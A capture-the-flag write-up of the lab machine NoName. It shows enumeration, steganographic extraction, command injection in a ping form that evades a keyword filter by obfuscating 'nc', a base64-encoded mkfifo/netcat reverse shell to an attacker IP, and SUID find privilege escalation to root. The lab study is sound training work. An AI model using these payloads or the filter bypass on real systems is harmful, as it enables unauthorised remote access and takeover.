[Offensive Security] Proving Grounds - NoName

[Offensive Security] Proving Grounds - NoName

https://portal.offensive-security.com/proving-grounds/play https://www.vulnhub.com/entry/haclabs-no_name,429/

·

6 min read

NoName may appear easy, but not everything is always straightforward. Only local.txt and proof.txt are valid flags.

Footprinting

Open ports

Nmap SYN scan:

kali@kali:~$ sudo nmap -sS -p- -Pn -v10 -oA syn_full 192.168.207.15
Discovered open port 80/tcp on 192.168.207.15

NSE scan:

kali@kali:~$ sudo nmap -sC -sV -p80 -Pn -v10 -oA nse 192.168.207.15
PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)

HTTP

In the main web page, there is a form which requires an IP:

>>>
POST /index.php HTTP/1.1
Host: 192.168.207.15

box=fake+query&submitt=submit

<<<
<h4>Fake Admin Area</h4>
<form action="index.php" method="post">
<input type="text" placeholder="fake query" name="box">
<input type="submit" placeholder="Run" value="submit" name="submitt">
</form>

Fake ping executed

However, that is a fake query box, as the IP input is not processed. Enumeration using ffuf reveals an admin directory:

kali@kali:~$ ffuf -v -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://192.168.207.15/FUZZ -t 50 -fc 404,403 -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
"http://192.168.207.15/
"http://192.168.207.15/"
"http://192.168.207.15/."
"http://192.168.207.15/admin"
"http://192.168.207.15/index.php"

This resource contains 4 images, with no sensitive information:

kali@kali:~$ wget -r http://192.168.207.15/admin
kali@kali:~$ ls ./192.168.207.15
ctf-01.jpg  haclabs.jpeg  new.jpg  Short.png
kali@kali:~$ exiftool ./192.168.207.15/*

Steganographic message

Looking closer at that admin page, a password is hidden at the very bottom response !

>>>
GET /admin HTTP/1.1
Host: 192.168.207.15

<<<
<html>
  <body style="background-color:Gainsboro;text-align:center">
  <h3 text-align:center>HacLabs directory of gallery.</h3>
    <img src="new.jpg" height="200" width="200">
    <br>
    <img src="ctf-01.jpg" height="200" width="200">
    <br>
    <img src="haclabs.jpeg" height="200" width="200">
    <br>
    <img src="Short.png" height="200" width="200">
  </body>
</html>


[...]


<!--passphrase:harder-->

But what I can do with that passphrase ? Is there any hidden file in one of the images ?

kali@kali:~$ steghide extract -sf haclabs.jpeg
Enter passphrase:
wrote extracted data to "imp.txt".

Yup !

kali@kali:~$ cat imp.txt
c3VwZXJhZG1pbi5waHA=

kali@kali:~$ base64 -d imp.txt
superadmin.php

This superadmin.php contains a ping feature (which is real this time!):

>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15

pinger=127.0.0.1&submitt=Submit+Query

<<<
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.015 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.029 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.027 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2030ms
rtt min/avg/max/mdev = 0.015/0.023/0.029/0.008 ms

OS Command Injection

This output is the same as in a standard shell:

kali@kali:~$ ping -c 3 127.0.0.1
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.013 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.038 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.060 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2036ms
rtt min/avg/max/mdev = 0.013/0.037/0.060/0.019 ms

I immediately found a blind command injection using the pipe symbol:

>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15

pinger=|sleep+10&submitt=Submit+Query

<<<
[10,452millis]

Note that the injection doesn't need to be blind, as the output is returned in the response:

>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15

pinger=|id&submitt=Submit+Query

<<<
uid=33(www-data) gid=33(www-data) groups=33(www-data)

See the query form in index.php was a rabbit hole, as the user's input isn't processed:

>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15

pinger=%0acat+index.php&submitt=Submit+Query

<<<
<?php
  if (isset($_POST['submitt']))
  {
    echo "Fake ping executed";
  }
?>

But we can't reverse shell as easily, as some characters are filtered, such as nc, or & (URL-encoded %26):

>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15

pinger=%0asleep+2%26&submitt=Submit+Query

<<<
[14millis]

Note that a Line Feed (\n URL-encoded %0a) can also be used to inject the next command.

Here, the injected command was not executed as the response came in less than 2 seconds (i.e. 0.014s). In fact, the source code shows that the filtered patterns are inarray(";", "&&", "/", "bin", "&", " &&", "ls", "nc", "dir", "pwd"):

>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15

pinger=%0acat+superadmin.php&submitt=Submit+Query

<<<
<?php
   if (isset($_POST['submitt']))
{
       $word=array(";","&&","/","bin","&"," &&","ls","nc","dir","pwd");
       $pinged=$_POST['pinger'];
       $newStr = str_replace($word, "", $pinged);
       if(strcmp($pinged, $newStr) == 0)
        {
            $flag=1;
        }
       else
        {
           $flag=0;
        }
}

if ($flag==1){
$outer=shell_exec("ping -c 3 $pinged");
echo "<pre>$outer</pre>";
}
?>

Having a reverse shell with nc seems tougher than it sounds, but some bypasses exist !

>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15

pinger=%0al\s%0a&submitt=Submit+Query

<<<
Short.png
admin
ctf-01.jpg
haclabs.jpeg
index.php
new.jpg
superadmin.php

Indeed, nc could be obfuscated as n\c, and bypass the filter:

>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15

pinger=%0ash|n\c++192.168.49.207+48590&submitt=Submit+Query

<<<
$ nc -nvlp 48590
listening on [any] 48590 ...
connect to [192.168.49.207] from (UNKNOWN) [192.168.207.15] 38142

Arf ! No command is being executed...

$ nc -nvlp 48590
listening on [any] 48590 ...
connect to [192.168.49.207] from (UNKNOWN) [192.168.207.15] 38144
id
ls
whoami
echo plz

After lots of trials and errors, I realized the following payload worked:

$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.207 48590 >/tmp/f' |base64
cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjgu
NDkuMjA3IDQ4NTkwID4vdG1wL2YK

Note that the base64-encoded command contains a new line, which should be URL-encoded to %0a:

>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15

pinger=%0aecho 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjgu%0aNDkuMjA3IDQ4NTkwID4vdG1wL2YK'|base64 -d|sh&submitt=Submit+Query

<<<
$ nc -nlvp 48590
listening on [any] 48590 ...
connect to [192.168.49.207] from (UNKNOWN) [192.168.207.15] 38194
sh: 0: can't access tty; job control turned off
$ whoami
www-data

A one-liner reverse shell could be:

$ curl -X POST -d "pinger=%0aecho 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjgu%0aNDkuMjA3IDQ4NTkwID4vdG1wL2YK'|base64 -d|sh&submitt=Submit+Query" http://192.168.207.15/superadmin.php

Local privilege escalation

local.txt

The users are:

$ grep sh$ /etc/passwd
root:x:0:0:root:/root:/bin/bash
haclabs:x:1000:1000:haclabs,,,:/home/haclabs:/bin/bash
yash:x:1001:1001:,,,:/home/yash:/bin/bash

The first flag is in yash's directory:

$ cd /home/yash

$ ls
flag1.txt
local.txt

$ cat *
Due to some security issues,I have saved haclabs password in a hidden file.

95[...]e6

proof.txt

Let's search, given the above sentence, the haclabs's password:

Due to some security issues,I have saved haclabs password in a hidden file.

Well, nothing interesting in his folder:

$ cd /home/haclabs

$ ls -la
total 80
drwxr-xr-x 16 haclabs haclabs 4096 Mar 16  2020 .
drwxr-xr-x  4 root    root    4096 Jan 27  2020 ..
-rw-------  1 haclabs haclabs 2576 Jan 30  2020 .ICEauthority
-rw-r--r--  1 root    root       0 Mar 16  2020 .bash_history
-rw-r--r--  1 haclabs haclabs 3771 Jan 27  2020 .bashrc
drwx------ 13 haclabs haclabs 4096 Feb  9  2020 .cache
drwx------ 11 haclabs haclabs 4096 Jan 27  2020 .config
drwx------  3 haclabs haclabs 4096 Jan 27  2020 .gnupg
drwx------  3 haclabs haclabs 4096 Jan 27  2020 .local
drwx------  5 haclabs haclabs 4096 Jan 27  2020 .mozilla
-rw-r--r--  1 haclabs haclabs  807 Jan 27  2020 .profile
drwx------  2 haclabs haclabs 4096 Jan 27  2020 .ssh
-rw-r--r--  1 haclabs haclabs    0 Jan 27  2020 .sudo_as_admin_successful
drwxr-xr-x  2 haclabs haclabs 4096 Jan 27  2020 Desktop
drwxr-xr-x  2 haclabs haclabs 4096 Jan 27  2020 Documents
drwxr-xr-x  2 haclabs haclabs 4096 Jan 27  2020 Downloads
drwxr-xr-x  2 haclabs haclabs 4096 Jan 27  2020 Music
drwxr-xr-x  2 haclabs haclabs 4096 Jan 27  2020 Pictures
drwxr-xr-x  2 haclabs haclabs 4096 Jan 27  2020 Public
drwxr-xr-x  2 haclabs haclabs 4096 Jan 27  2020 Templates
drwxr-xr-x  2 haclabs haclabs 4096 Jan 27  2020 Videos
-rw-r--r--  1 root    root     152 Jan 30  2020 flag2.txt

Is there anything interesting inflag2.txt ?

$ cat flag2.txt
I am flag2

           ---------------               ----------------


                               --------

Nope :/ Using linpeas, I realized searching for haclabs's password was a rabbit hole. Indeed, I forgot to look for root SUIDs !

                                         ╔═══════════════════╗
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
                                         ╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid

-rwsr-xr-x 1 root root 233K Nov  5  2017 /usr/bin/find

Exploiting that find command, here we get the root flag:

$ find . -exec /bin/sh -p \; -quit

$ id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)

$ ls /root
flag3.txt
proof.txt

$ cat /root/*
Your flag is in another file...
41[...]51

Did you find this article valuable?

Support jamarir's blog by becoming a sponsor. Any amount is appreciated!